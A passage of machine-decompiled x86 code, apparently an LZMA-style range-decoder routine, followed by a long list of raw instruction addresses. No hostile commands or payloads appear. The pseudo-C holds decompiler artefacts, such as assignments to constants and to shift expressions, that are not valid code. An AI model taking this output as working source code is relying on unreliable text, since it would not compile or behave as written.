											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                  0x00000000
                  0x00406355
                  0x00406355
                  0x00406359
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x00406364
                  0x00406371
                  0x00406374
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
